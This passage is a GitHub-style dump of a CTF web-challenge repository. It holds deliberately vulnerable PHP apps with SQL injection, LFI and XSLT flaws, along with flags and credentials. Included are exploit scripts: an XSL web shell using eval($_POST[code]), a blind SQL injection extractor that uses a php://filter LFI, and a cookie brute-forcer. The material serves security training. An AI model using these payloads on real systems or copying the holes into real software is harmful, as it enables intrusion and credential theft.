├── 2017 ├── Belluminar2017 │ ├── README.md │ ├── color-world.pdf │ └── prob │ │ ├── exploit │ │ ├── exploit5.xsl │ │ └── exploit7.xsl │ │ ├── htdocs │ │ ├── index.php │ │ ├── login.php │ │ └── page │ │ │ ├── 801f7201346b43f8ee8390a1ef20ddcd │ │ │ ├── green.xsl │ │ │ ├── orange.xsl │ │ │ └── red.xsl │ │ │ ├── assets │ │ │ ├── bootstrap.min.js │ │ │ ├── script.js │ │ │ └── style.css │ │ │ ├── base.php │ │ │ ├── config.php │ │ │ ├── index.php │ │ │ ├── readme.php │ │ │ └── style.xml │ │ └── table.sql ├── can_you_do_it │ ├── can_you_do_it.sql │ ├── config.php │ └── index.php ├── dirt-Y │ ├── exploit │ │ ├── findhex.py │ │ └── inject.py │ ├── flag.php │ └── index.php ├── is_this_possible │ ├── config.php │ ├── index.php │ └── is_this_possible.sql ├── layer7_external2017 │ ├── Daniel's_DAILY_LIFE │ │ ├── bbcode.sql │ │ ├── htdocs │ │ │ ├── admin │ │ │ │ ├── add_member.php │ │ │ │ ├── admin_home.php │ │ │ │ ├── admin_library.php │ │ │ │ ├── admin_read.php │ │ │ │ ├── admin_write.php │ │ │ │ └── index.php │ │ │ ├── assets │ │ │ │ ├── bootstrap-4.0.0-alpha.6.min.js │ │ │ │ ├── smooth-scroll.js │ │ │ │ └── style.css │ │ │ ├── bbcode.txt │ │ │ ├── contacts.php │ │ │ ├── cooking.php │ │ │ ├── home.php │ │ │ ├── include │ │ │ │ ├── config.php │ │ │ │ └── library.php │ │ │ ├── index.php │ │ │ ├── login.php │ │ │ ├── logout.php │ │ │ ├── read.php │ │ │ ├── robots.txt │ │ │ ├── shop │ │ │ │ └── shop.php │ │ │ └── song.php │ │ └── selenium │ │ │ └── bot.py │ ├── can_you_bypass_me │ │ ├── config.php │ │ ├── flagflagflagflag.php │ │ ├── index.php │ │ └── readme.md │ └── readme.md ├── power_of_xx_2017 │ ├── basic_web │ │ ├── exploit.py │ │ ├── readme.md │ │ ├── src │ │ │ ├── adm1n.htm │ │ │ ├── assets │ │ │ │ ├── bootstrap.min.js │ │ │ │ └── style.css │ │ │ ├── board.htm │ │ │ ├── config.htm │ │ │ ├── home.htm │ │ │ ├── index.htm │ │ │ ├── login.htm │ │ │ ├── logout.htm │ │ │ └── send.htm │ │ └── table.sql │ └── sqlgame │ │ ├── readme.md │ │ ├── src │ │ ├── assets │ │ │ ├── adfsadfasdfasdfasdfasdf31!@$&(^^&^!@aag12345.png │ │ │ └── logo.png │ │ ├── config.php │ │ └── index.php │ │ └── table.sql └── simple_login │ ├── config.php │ ├── index.php │ └── table.sql ├── 2018 ├── 2018_Layer7_CTF_Margaret │ ├── README.md │ ├── db │ │ └── database.db │ └── html │ │ ├── .htaccess │ │ ├── classes │ │ ├── Controller.class.php │ │ ├── Render.class.php │ │ └── User.class.php │ │ ├── config │ │ ├── config.php │ │ └── function.php │ │ ├── index.php │ │ ├── public │ │ ├── css │ │ │ └── style.css │ │ ├── font │ │ │ └── BMYEONSUNG_ttf.ttf │ │ ├── img │ │ │ └── main.jpg │ │ └── js │ │ │ └── jquery-3.3.1.min.js │ │ └── templates │ │ ├── footer.html │ │ ├── header.html │ │ ├── home.html │ │ ├── login.html │ │ ├── logout.html │ │ ├── mypage.html │ │ ├── need_session │ │ ├── logout.html │ │ └── mypage.html │ │ └── register.html ├── H3X0R-CTF-2018 │ ├── README.md │ ├── goodaegi_board │ │ ├── classes │ │ │ ├── board.class.php │ │ │ ├── database.class.php │ │ │ └── user.class.php │ │ ├── config │ │ │ ├── dbconfig.php │ │ │ └── function.php │ │ ├── control.php │ │ ├── flag.php │ │ ├── footer.php │ │ ├── goodaegi_board.sql │ │ ├── header.php │ │ ├── index.php │ │ ├── static │ │ │ ├── css │ │ │ │ └── style.css │ │ │ └── js │ │ │ │ ├── bootstrap.min.js │ │ │ │ ├── jquery-3.2.1.slim.min.js │ │ │ │ └── popper.min.js │ │ └── templates │ │ │ ├── board_body.html │ │ │ ├── board_footer.html │ │ │ ├── board_header.html │ │ │ ├── home.html │ │ │ ├── insert.html │ │ │ ├── join.html │ │ │ └── login.html │ └── sqlgame_revenge │ │ ├── config.php │ │ └── index.php ├── count │ ├── README.md │ ├── exploit │ │ ├── exploit.py │ │ └── php_file_put_contents_race_condition.png │ └── www │ │ ├── flag-6ece7416.php │ │ ├── index.php │ │ └── template.tpl └── hackingcamp18 │ ├── db │ └── database.db │ ├── exploit.py │ ├── html │ ├── .htaccess │ ├── classes │ │ ├── Controller.class.php │ │ ├── Render.class.php │ │ ├── Shop.class.php │ │ └── User.class.php │ ├── config │ │ ├── config.php │ │ └── function.php │ ├── index.php │ ├── public │ │ ├── css │ │ │ └── style.css │ │ ├── font │ │ │ └── BMYEONSUNG_ttf.ttf │ │ ├── img │ │ │ ├── flag.png │ │ │ ├── grim.png │ │ │ ├── helmet.png │ │ │ ├── shampoo.jpg │ │ │ └── tire.jpg │ │ └── js │ │ │ └── jquery-3.3.1.min.js │ └── templates │ │ ├── footer.html │ │ ├── header.html │ │ ├── home.html │ │ ├── login.html │ │ ├── logout.html │ │ ├── mypage.html │ │ ├── register.html │ │ └── shop.html │ ├── readme.md │ └── www.zip ├── 2019 ├── Belluminar │ ├── .htaccess │ ├── classes │ │ ├── AlephDB │ │ │ ├── @Aleph.class.php │ │ │ ├── Aleph.class.php │ │ │ └── alephdb │ │ ├── Controller.class.php │ │ ├── MunTemplate.class.php │ │ ├── Render.class.php │ │ ├── User.class.php │ │ └── Videos.class.php │ ├── config │ │ ├── .htaccess │ │ ├── config.php │ │ ├── function.php │ │ └── server │ ├── index.php │ ├── static │ │ ├── css │ │ │ └── style.css │ │ ├── img │ │ │ ├── 404.png │ │ │ ├── logo.png │ │ │ └── main.png │ │ └── js │ │ │ └── jquery-3.4.1.min.js │ └── templates │ │ ├── footer.html │ │ ├── header.html │ │ ├── index.html │ │ ├── login.html │ │ ├── mypage.html │ │ ├── read.html │ │ ├── register.html │ │ ├── upload.html │ │ └── videos.html ├── Christmas_CTF │ └── Dynamic_SQL │ │ ├── mild_taste(unintended) │ │ ├── config.php │ │ ├── function.php │ │ ├── index.php │ │ ├── login.php │ │ ├── source.zip │ │ └── static │ │ │ ├── bootstrap.min.js │ │ │ ├── favicon.png │ │ │ ├── jquery-3.4.1.min.js │ │ │ ├── pig.png │ │ │ ├── style.css │ │ │ └── theme.css │ │ └── spicy_taste │ │ ├── config.php │ │ ├── function.php │ │ ├── index.php │ │ ├── login.php │ │ ├── source.zip │ │ └── static │ │ ├── bootstrap.min.js │ │ ├── favicon.png │ │ ├── jquery-3.4.1.min.js │ │ ├── pig.png │ │ ├── style.css │ │ └── theme.css ├── Sunrin_Internet_High_School_CTF_2019 │ ├── README.md │ ├── jjang9 │ │ ├── 0.png │ │ ├── README.md │ │ ├── index.html │ │ ├── lfi.php │ │ └── upload.php │ ├── last_old_school │ │ ├── config.php │ │ └── index.php │ └── my_first_app │ │ ├── app │ │ ├── app.py │ │ ├── config.py │ │ ├── model.py │ │ ├── mydb.db │ │ ├── static │ │ │ ├── eye.png │ │ │ ├── mommyhand.png │ │ │ ├── munsiu.png │ │ │ ├── peach.png │ │ │ └── sibariza.png │ │ └── templates │ │ │ ├── board.html │ │ │ ├── home.html │ │ │ ├── login.html │ │ │ ├── profile.html │ │ │ ├── read.html │ │ │ ├── register.html │ │ │ ├── report.html │ │ │ └── write.html │ │ ├── chromedriver │ │ └── robot.py └── rename │ ├── backup │ └── index.html │ ├── index.php │ └── upload.php ├── 2021 └── LAYER7_CTF │ ├── handmade │ ├── Dockerfile │ ├── flag │ └── src │ │ ├── app.py │ │ ├── htdocs │ │ ├── about.html │ │ ├── blog.html │ │ ├── breadfactorytemplate.psd │ │ ├── contact.html │ │ ├── css │ │ │ └── style.css │ │ ├── images │ │ │ ├── bg-aside.jpg │ │ │ ├── bg-blog-heading.png │ │ │ ├── bg-body.jpg │ │ │ ├── bg-content.jpg │ │ │ ├── bg-footer.gif │ │ │ ├── bg-header.gif │ │ │ ├── bg-menu-selected.jpg │ │ │ ├── bg-menu-selected2.jpg │ │ │ ├── collection.jpg │ │ │ ├── croissants.jpg │ │ │ ├── favorites.jpg │ │ │ ├── icons.png │ │ │ ├── interface.png │ │ │ ├── loafs.jpg │ │ │ ├── logo.png │ │ │ ├── sandwiches.jpg │ │ │ ├── traditional.jpg │ │ │ └── whats-new.png │ │ ├── index.html │ │ └── menu.html │ │ ├── requirements.txt │ │ └── response_form.py │ └── selfmade │ ├── Dockerfile │ ├── flag │ └── src │ ├── app.py │ ├── contents │ ├── 1 │ └── 2 │ ├── htdocs │ └── index.html │ ├── requirements.txt │ └── response_form.py ├── 2022 ├── BOB_WEB_CTF │ ├── dom_clobbering │ │ ├── index.html │ │ └── writeup │ │ │ └── writeup.txt │ ├── pp │ │ ├── config.js │ │ ├── index.html │ │ └── writeup │ │ │ └── writeup.txt │ └── rpo │ │ ├── config.js │ │ ├── index.php │ │ └── writeup │ │ ├── exploit.html │ │ └── writeup.txt ├── HSPACE_CTF │ ├── hspace_proxy │ │ ├── admin │ │ │ ├── Dockerfile │ │ │ ├── db │ │ │ │ └── init.sql │ │ │ ├── flag.txt │ │ │ └── src │ │ │ │ ├── app.py │ │ │ │ ├── htdocs │ │ │ │ ├── index.html │ │ │ │ └── write.html │ │ │ │ ├── model.py │ │ │ │ ├── requirements.txt │ │ │ │ └── response_form.py │ │ ├── docker-compose.yml │ │ └── public │ │ │ ├── Dockerfile │ │ │ └── src │ │ │ ├── app.py │ │ │ ├── htdocs │ │ │ ├── index.html │ │ │ └── notice.html │ │ │ ├── model.py │ │ │ ├── requirements.txt │ │ │ └── response_form.py │ ├── lucky7 │ │ ├── index.php │ │ └── lucky.php │ └── maidcha │ │ ├── Dockerfile │ │ ├── flag │ │ ├── memo │ │ ├── 1 │ │ └── 2 │ │ └── src │ │ ├── app.py │ │ ├── htdocs │ │ └── index.html │ │ ├── requirements.txt │ │ └── response_form.py └── SUNRIN_CTF │ ├── BABY_XSS │ ├── bot │ │ └── bot.py │ ├── index.php │ ├── init.sql │ ├── onlybot.php │ └── report.php │ ├── HAPPY │ ├── bot │ │ └── bot.py │ ├── config.js │ ├── index.php │ ├── init.sql │ ├── onlybot.php │ ├── report.php │ └── writeup │ │ └── exploit.html │ └── LOGIN_MASTER │ ├── config.php │ ├── ebd03212efcf1965e52fb3d838fabb92.db │ ├── index.php │ └── user.php ├── 2024 └── SUNRIN_CTF │ ├── checkjs │ ├── Dockerfile │ ├── app │ │ ├── flag │ │ └── index.js │ ├── docker-compose.yml │ └── for_user.zip │ └── memoboard │ ├── Dockerfile │ ├── docker-compose.yml │ ├── for_user.zip │ └── src │ ├── 2fa.php │ ├── board.php │ ├── db.php │ ├── index.php │ ├── login.php │ ├── logout.php │ ├── mypage.php │ ├── register.php │ ├── style.css │ └── verify.php ├── .gitattributes └── README.md /.gitattributes: -------------------------------------------------------------------------------- 1 | * linguist-vendored 2 | -------------------------------------------------------------------------------- /2017/Belluminar2017/README.md: -------------------------------------------------------------------------------- 1 | # Belluminar-2017-Color-word 2 | 3 | ~~~ 4 | made by munsiwoo 5 | ~~~ 6 | 7 | * Color World 8 | 9 | * LFI, SQL Injection, XSLT Vuln 10 | 11 | * 풀이는 color-world.pdf 참고 -------------------------------------------------------------------------------- /2017/Belluminar2017/color-world.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/munsiwoo/ctf-web-prob/eb4124d4208ef7a8c28c7e16a41b5cfa7bcd86a5/2017/Belluminar2017/color-world.pdf -------------------------------------------------------------------------------- /2017/Belluminar2017/prob/exploit/exploit5.xsl: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 |
6 | 7 |
8 | 9 |
10 | Vendor:
11 | Vendor URL: 12 | 13 | eval($_POST[code]); 14 | 15 | 16 | 17 | 18 | 19 | -------------------------------------------------------------------------------- /2017/Belluminar2017/prob/exploit/exploit7.xsl: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 |
6 | 7 |
8 | 9 | 10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /2017/Belluminar2017/prob/htdocs/index.php: -------------------------------------------------------------------------------- 1 | location.href='?page=login'"); 7 | if(!file_exists($page.".php")) echo "file not found.\n"; 8 | if(!preg_match("/page/i", $page)) require($page.".php"); -------------------------------------------------------------------------------- /2017/Belluminar2017/prob/htdocs/page/801f7201346b43f8ee8390a1ef20ddcd/green.xsl: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 |
6 | 7 |
8 | 9 | 10 | -------------------------------------------------------------------------------- /2017/Belluminar2017/prob/htdocs/page/801f7201346b43f8ee8390a1ef20ddcd/orange.xsl: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 |
6 | 7 |
8 | 9 | 10 | -------------------------------------------------------------------------------- /2017/Belluminar2017/prob/htdocs/page/801f7201346b43f8ee8390a1ef20ddcd/red.xsl: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 |
6 | 7 |
8 | 9 | 10 | -------------------------------------------------------------------------------- /2017/Belluminar2017/prob/htdocs/page/assets/script.js: -------------------------------------------------------------------------------- 1 | function load(argv){ 2 | var colors = document.colors; 3 | colors.color.value = argv; 4 | colors.submit(); 5 | } -------------------------------------------------------------------------------- /2017/Belluminar2017/prob/htdocs/page/config.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /2017/Belluminar2017/prob/htdocs/page/index.php: -------------------------------------------------------------------------------- 1 | location.href='../'"); 8 | } 9 | 10 | if(isset($_GET['leave'])){ 11 | session_destroy(); 12 | exit(""); 13 | } 14 | 15 | $conn = mysqli_connect($DB_HOST, $DB_USER, $DB_PASSWORD, $DB_NAME); 16 | 17 | $color = isset($_POST['color']) ? $_POST['color'] : 'red'; 18 | $query = "SELECT * FROM `xslt` WHERE xsl='".$color."'"; 19 | $assoc = mysqli_fetch_assoc(mysqli_query($conn, $query)) or die('color not found.'); 20 | 21 | $xml = new DOMDocument; 22 | $xml->load("style.xml"); 23 | 24 | $xsl = new DOMDocument; 25 | $xsl->load($assoc['path']); 26 | 27 | $proc = new XSLTProcessor; 28 | $proc->registerPHPFunctions(); 29 | $proc->importStyleSheet($xsl); 30 | 31 | require("base.php"); 32 | ?> 33 | -------------------------------------------------------------------------------- /2017/Belluminar2017/prob/htdocs/page/readme.php: -------------------------------------------------------------------------------- 1 | location.href='../'"); 7 | } 8 | 9 | # flag{bfpdopfoprowpelwlekdsooasdiasodiowoqwe} 10 | ?> -------------------------------------------------------------------------------- /2017/Belluminar2017/prob/htdocs/page/style.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | It's fun XD 5 | 6 | -------------------------------------------------------------------------------- /2017/Belluminar2017/prob/table.sql: -------------------------------------------------------------------------------- 1 | SET SQL_MODE="NO_AUTO_VALUE_ON_ZERO"; 2 | SET NAMES UTF8; 3 | 4 | CREATE TABLE IF NOT EXISTS `users` ( 5 | `username` varchar(100) NOT NULL, 6 | `password` varchar(100) NOT NULL 7 | ) ENGINE=InnoDB DEFAULT CHARSET=utf8; 8 | 9 | CREATE TABLE IF NOT EXISTS `xslt` ( 10 | `xsl` varchar(100) NOT NULL, 11 | `path` varchar(100) NOT NULL 12 | ) ENGINE=InnoDB DEFAULT CHARSET=utf8; 13 | 14 | INSERT INTO `xslt` (`xsl`, `path`) VALUES 15 | ('red', './801f7201346b43f8ee8390a1ef20ddcd/red.xsl'), 16 | ('orange', './801f7201346b43f8ee8390a1ef20ddcd/orange.xsl'), 17 | ('green', './801f7201346b43f8ee8390a1ef20ddcd/green.xsl'); -------------------------------------------------------------------------------- /2017/can_you_do_it/can_you_do_it.sql: -------------------------------------------------------------------------------- 1 | CREATE TABLE IF NOT EXISTS `can_you_do_it` ( 2 | `id` varchar(50) NOT NULL 3 | ) ENGINE=MyISAM DEFAULT CHARSET=latin1; 4 | 5 | 6 | INSERT INTO `can_you_do_it` (`id`) VALUES 7 | ('admin'), 8 | ('flag is {**secret**}'); -------------------------------------------------------------------------------- /2017/can_you_do_it/config.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /2017/can_you_do_it/index.php: -------------------------------------------------------------------------------- 1 | 10) exit("id is too long"); 8 | 9 | $conn = mysqli_connect(DB_HOST, DB_USER, DB_PASSWORD, DB_NAME) or die("connect error"); 10 | $query = "SELECT id FROM `can_you_do_it` WHERE id='".$_GET['id']."'"; 11 | $row = mysqli_fetch_array(mysqli_query($conn, $query); 12 | 13 | echo "
"; 14 | if($row['id']){ 15 | echo $row['id']; 16 | } 17 | else { 18 | echo "None"; 19 | } 20 | echo "
"; 21 | 22 | highlight_file(__FILE__); 23 | ?> -------------------------------------------------------------------------------- /2017/dirt-Y/exploit/findhex.py: -------------------------------------------------------------------------------- 1 | from random import randrange 2 | # dirt-Y challenge exploit 3 | # made by munsiwoo 4 | 5 | def find() : 6 | while True : 7 | random_one = randrange(100, 255) 8 | random_two = randrange(100, 255) 9 | xor = ord(chr(random_one)) ^ ord(chr(random_two)) 10 | if(xor == 50) : 11 | break 12 | 13 | a = '\\' + hex(random_one)[1:] 14 | b = '\\' + hex(random_two)[1:] 15 | print(a + ' ^ ' + b + ' = 2') 16 | 17 | if __name__ == '__main__' : 18 | find() 19 | -------------------------------------------------------------------------------- /2017/dirt-Y/exploit/inject.py: -------------------------------------------------------------------------------- 1 | from requests import get 2 | # dirt-Y challenge exploit 3 | # made by munsiwoo 4 | 5 | def main() : 6 | uri = 'http://127.0.0.1/probs/dirt-Y/index.php' 7 | headers = { 8 | 'Content-Type' : 'application/x-www-form-urlencoded', 9 | 'Cookie' : 'a=\xbd;b=\x8f;x=88;' 10 | } 11 | 12 | for x in range(1000000) : 13 | response = get(uri, headers=headers) 14 | if(response.text.find("flag{") != -1) : 15 | print(response.text) 16 | break 17 | 18 | print('Number of attempts : ' + str(x)) 19 | 20 | if __name__ == '__main__' : 21 | main() 22 | -------------------------------------------------------------------------------- /2017/dirt-Y/flag.php: -------------------------------------------------------------------------------- 1 | \n"; 4 | echo "

flag{yes_this_prob_is_dirty_ʕ•ᴥ•ʔ}

\n"; 5 | exit; 6 | } 7 | ?> -------------------------------------------------------------------------------- /2017/dirt-Y/index.php: -------------------------------------------------------------------------------- 1 | Congratulation!!!!
flag is **secret**"); 9 | } 10 | ?> -------------------------------------------------------------------------------- /2017/is_this_possible/index.php: -------------------------------------------------------------------------------- 1 | |&|=|;|#|_|or|and|union|select|into|info|sc|in|like|regex|rand|limit|prob|0x|0b/i"; 7 | if(preg_match($filter, $_GET['go'])) exit("403 forbidden"); 8 | if(preg_match("/\s/", $_GET['go'])) exit("whitespace nono"); 9 | 10 | $i = 0; 11 | $conn = mysqli_connect(DB_HOST, DB_USER, DB_PASSWORD, DB_NAME); 12 | $query = mysqli_query($conn, "SELECT * FROM `is_this_possible` ORDER BY ".$_GET['go']." DESC"); 13 | 14 | echo ""; 15 | echo ""; 16 | while($row = mysqli_fetch_array($query)){ 17 | $res[$i++] = $row['id']; 18 | echo ""; 19 | } 20 | echo "
id
{$row['id']}
"; 21 | 22 | if($res[0] === "admin" && $res[1] === "19990301" && $res[2] === "guest"){ 23 | if((int)$res[1] == $_GET['foo'] && strlen($_GET['foo']) > 10){ 24 | solve(); 25 | } 26 | } 27 | } 28 | highlight_file(__FILE__); 29 | ?> -------------------------------------------------------------------------------- /2017/is_this_possible/is_this_possible.sql: -------------------------------------------------------------------------------- 1 | SET SQL_MODE="NO_AUTO_VALUE_ON_ZERO"; 2 | 3 | CREATE TABLE IF NOT EXISTS `is_this_possible` ( 4 | `id` varchar(50) NOT NULL 5 | ) ENGINE=MyISAM DEFAULT CHARSET=utf8; 6 | 7 | 8 | INSERT INTO `is_this_possible` (`id`) VALUES 9 | ('admin'), 10 | ('guest'), 11 | ('19990301'), 12 | ('19970101'), 13 | ('20010609'); -------------------------------------------------------------------------------- /2017/layer7_external2017/Daniel's_DAILY_LIFE/bbcode.sql: -------------------------------------------------------------------------------- 1 | SET SQL_MODE="NO_AUTO_VALUE_ON_ZERO"; 2 | SET NAMES UTF8; 3 | 4 | CREATE TABLE IF NOT EXISTS `contacts` ( 5 | `idx` int(11) NOT NULL AUTO_INCREMENT, 6 | `title` varchar(100) NOT NULL, 7 | `contents` varchar(512) NOT NULL, 8 | PRIMARY KEY (`idx`) 9 | ) ENGINE=MyISAM DEFAULT CHARSET=utf8 AUTO_INCREMENT=2 ; 10 | 11 | CREATE TABLE IF NOT EXISTS `cooking` ( 12 | `idx` int(11) NOT NULL AUTO_INCREMENT, 13 | `title` varchar(50) NOT NULL, 14 | `contents` varchar(10000) NOT NULL, 15 | PRIMARY KEY (`idx`) 16 | ) ENGINE=MyISAM DEFAULT CHARSET=utf8 AUTO_INCREMENT=6 ; 17 | 18 | INSERT INTO `cooking` (`idx`, `title`, `contents`) VALUES 19 | (1, 'Welcome to cooking category', 'welcome to cooking category
articles related to cooking will be posted.'), 20 | (2, 'Steak is very delicious XD', '\r\ngood good good~'); 21 | 22 | 23 | CREATE TABLE IF NOT EXISTS `song` ( 24 | `idx` int(11) NOT NULL AUTO_INCREMENT, 25 | `title` varchar(50) NOT NULL, 26 | `contents` varchar(10000) NOT NULL, 27 | PRIMARY KEY (`idx`) 28 | ) ENGINE=MyISAM DEFAULT CHARSET=utf8 AUTO_INCREMENT=3 ; 29 | 30 | INSERT INTO `song` (`idx`, `title`, `contents`) VALUES 31 | (1, 'Welcome to song category', 'Welcome to song category!'), 32 | (2, 'I love Sam Smith songs. XD', 'Im Not The Only One is good, Stay with me is good.'); 33 | 34 | CREATE TABLE IF NOT EXISTS `users` ( 35 | `token` varchar(100) NOT NULL, 36 | `username` varchar(100) NOT NULL, 37 | `password` varchar(100) NOT NULL, 38 | PRIMARY KEY (`username`) 39 | ) ENGINE=InnoDB DEFAULT CHARSET=utf8; 40 | 41 | INSERT INTO `users` (`token`, `username`, `password`) VALUES 42 | ('1694138c2ede438201a100d641307ec78b3f3c96', 'admin', '1e5915d79c1edc1064f2862b0bb1b77318a0e6d670a99335eb4bf6b3d2e9fea6'); -------------------------------------------------------------------------------- /2017/layer7_external2017/Daniel's_DAILY_LIFE/htdocs/admin/admin_home.php: -------------------------------------------------------------------------------- 1 | location.href='../home.php';"); 7 | } 8 | ?> 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | Admin page 18 | 19 | 20 | 44 |
45 |
46 |
47 |

Admin page

48 |

daily life of Daniel

49 |
50 |
51 |
52 | 53 | 54 | 55 | 56 | 57 | -------------------------------------------------------------------------------- /2017/layer7_external2017/Daniel's_DAILY_LIFE/htdocs/admin/admin_library.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /2017/layer7_external2017/Daniel's_DAILY_LIFE/htdocs/admin/admin_read.php: -------------------------------------------------------------------------------- 1 | location.href='../';"); 8 | 9 | contacts_read(); 10 | ?> -------------------------------------------------------------------------------- /2017/layer7_external2017/Daniel's_DAILY_LIFE/htdocs/admin/index.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /2017/layer7_external2017/Daniel's_DAILY_LIFE/htdocs/assets/smooth-scroll.js: -------------------------------------------------------------------------------- 1 | $('a[href*="#"]') 2 | // Remove links that don't actually link to anything 3 | .not('[href="#"]') 4 | .not('[href="#0"]') 5 | .click(function(event) { 6 | // On-page links 7 | if ( 8 | location.pathname.replace(/^\//, '') == this.pathname.replace(/^\//, '') 9 | && 10 | location.hostname == this.hostname 11 | ) { 12 | // Figure out element to scroll to 13 | var target = $(this.hash); 14 | target = target.length ? target : $('[name=' + this.hash.slice(1) + ']'); 15 | // Does a scroll target exist? 16 | if (target.length) { 17 | // Only prevent default if animation is actually gonna happen 18 | event.preventDefault(); 19 | $('html, body').animate({ 20 | scrollTop: target.offset().top 21 | }, 1000, function() { 22 | // Callback after animation 23 | // Must change focus! 24 | var $target = $(target); 25 | $target.focus(); 26 | if ($target.is(":focus")) { // Checking if the target was focused 27 | return false; 28 | } else { 29 | $target.attr('tabindex','-1'); // Adding tabindex for elements not focusable 30 | $target.focus(); // Set focus again 31 | }; 32 | }); 33 | } 34 | } 35 | }); -------------------------------------------------------------------------------- /2017/layer7_external2017/Daniel's_DAILY_LIFE/htdocs/bbcode.txt: -------------------------------------------------------------------------------- 1 | [b]Bold Text[/b] 2 | [i]Italic Text[/i] 3 | [url]http://www.php.net/[/url] 4 | [url=http://pecl.php.net/][b]Content Text[/b][/url] 5 | [img]http://static.php.net/www.php.net/images/php.gif[/img] 6 | [url=http://www.php.net/] 7 | [img]http://static.php.net/www.php.net/images/php.gif[/img] 8 | [/url] -------------------------------------------------------------------------------- /2017/layer7_external2017/Daniel's_DAILY_LIFE/htdocs/include/config.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /2017/layer7_external2017/Daniel's_DAILY_LIFE/htdocs/index.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /2017/layer7_external2017/Daniel's_DAILY_LIFE/htdocs/logout.php: -------------------------------------------------------------------------------- 1 | location.href='home.php';"); 7 | ?> -------------------------------------------------------------------------------- /2017/layer7_external2017/Daniel's_DAILY_LIFE/htdocs/robots.txt: -------------------------------------------------------------------------------- 1 | User-agent: * 2 | Allow: / -------------------------------------------------------------------------------- /2017/layer7_external2017/Daniel's_DAILY_LIFE/htdocs/shop/shop.php: -------------------------------------------------------------------------------- 1 | Congratulation!!!!flag is {dlanswpsdjEoTskdy?wharneorlduTdma?}'; 15 | ?> -------------------------------------------------------------------------------- /2017/layer7_external2017/Daniel's_DAILY_LIFE/selenium/bot.py: -------------------------------------------------------------------------------- 1 | #-*- coding:utf-8 -*- 2 | from selenium import webdriver 3 | from time import sleep 4 | 5 | admin_id = "admin" 6 | admin_pw = "iopqwe123qwe@" 7 | login_page = "http://ctf.layer7.kr:6002/bbcode/login.php" 8 | read_page = "http://ctf.layer7.kr:6002/bbcode/admin/admin_read.php" 9 | 10 | driver = webdriver.PhantomJS() 11 | driver.implicitly_wait(3) 12 | 13 | driver.get(login_page) 14 | driver.find_element_by_name("username").send_keys(admin_id) 15 | driver.find_element_by_name("password").send_keys(admin_pw) 16 | submit_button = driver.find_elements_by_xpath("//input[@value='Submit']")[0] 17 | submit_button.click() 18 | 19 | while(1) : 20 | driver.get(read_page) 21 | sleep(2) -------------------------------------------------------------------------------- /2017/layer7_external2017/can_you_bypass_me/config.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /2017/layer7_external2017/can_you_bypass_me/flagflagflagflag.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /2017/layer7_external2017/can_you_bypass_me/index.php: -------------------------------------------------------------------------------- 1 | '; 20 | highlight_file(__FILE__); -------------------------------------------------------------------------------- /2017/layer7_external2017/can_you_bypass_me/readme.md: -------------------------------------------------------------------------------- 1 | # can-you-bypass-me? 2 | can you bypass me? (web) - regexp bypass, wild card 3 | 4 | ###### I used a docker. 5 | -------------------------------------------------------------------------------- /2017/layer7_external2017/readme.md: -------------------------------------------------------------------------------- 1 | Layer7 CTF 2 | ============= 3 | 2017-09-23 09:00 ~ 2017-09-24 09:00 4 | ------------- 5 | 6 | -------------------------------------- 7 | ###### can you bypass me? (web) - regexp bypass, wild card 8 | ###### present (web) - released later 9 | ###### daily life of Daniel (web) - xss 10 | -------------------------------------------------------------------------------- /2017/power_of_xx_2017/basic_web/exploit.py: -------------------------------------------------------------------------------- 1 | #-*- coding:utf-8 -*- 2 | import http.client, base64 3 | from urllib.parse import quote 4 | 5 | ''' 6 | power of xx - basic web1 7 | blind insert injection 8 | made by SiwooMun 9 | ''' 10 | 11 | conn = http.client.HTTPConnection('125.131.189.15', 6001) 12 | headers = {'Content-Type': 'application/x-www-form-urlencoded'} 13 | 14 | conn.request('GET', '/?p=php://filter/convert.base64-encode/resource=config', '', headers) 15 | secret_key = base64.b64decode(conn.getresponse().read()).decode('utf-8') # config.php 16 | 17 | payload = (lambda col,x,y:",if((select substr(%s,%d,1) from users)=%s,(select 1 union select 2), 2))#"%(col,x,y)) 18 | quote_escape = 'email=a&title=a\&contents=' 19 | username = password = "" 20 | 21 | for x in range(1, 6) : # extract username 22 | for y in "abcdefghijklmnopqrstuvwxyz0123456789" : 23 | body = quote_escape + quote(payload('username',x,str(hex(ord(y))))) 24 | conn.request('POST', '/send.htm', body, headers) 25 | response = str(conn.getresponse().read()) 26 | 27 | if(response.find('err') != -1) : 28 | username += y 29 | print("username : " + username) 30 | break 31 | 32 | for x in range(1, 15) : # extract password 33 | for y in "abcdefghijklmnopqrstuvwxyz0123456789" : 34 | body = quote_escape + quote(payload('password',x,str(hex(ord(y))))) 35 | conn.request('POST', '/send.htm', body, headers) 36 | response = str(conn.getresponse().read()) 37 | 38 | if(response.find('err') != -1) : 39 | password += y 40 | print("password : " + password) 41 | break 42 | 43 | conn.close() 44 | 45 | print('----- config.php -----') 46 | print(secret_key) # secret key : powerofxx 47 | print('----------------------') 48 | print('username : ' + username) 49 | print('password : ' + password) 50 | print('----------------------') -------------------------------------------------------------------------------- /2017/power_of_xx_2017/basic_web/readme.md: -------------------------------------------------------------------------------- 1 | # Power of Xx 2017 2 | 3 | ~~~ 4 | * 제작 : 문시우 5 | 6 | * 문제명 : basic web 7 | 8 | * 난이도 : 하 9 | 10 | * 분야 : 웹 11 | ~~~ 12 | ~~~ 13 | 설명 : lfi + sqli (error based blind insert injection) 14 | ?p= 파라미터에서 lfi 취약점이 발생한다. php wrapper를 이용해 소스를 얻을 수 있다. 15 | ex : ?p=php://filter/convert.base64-encode/resource=config 16 | 17 | 소스를 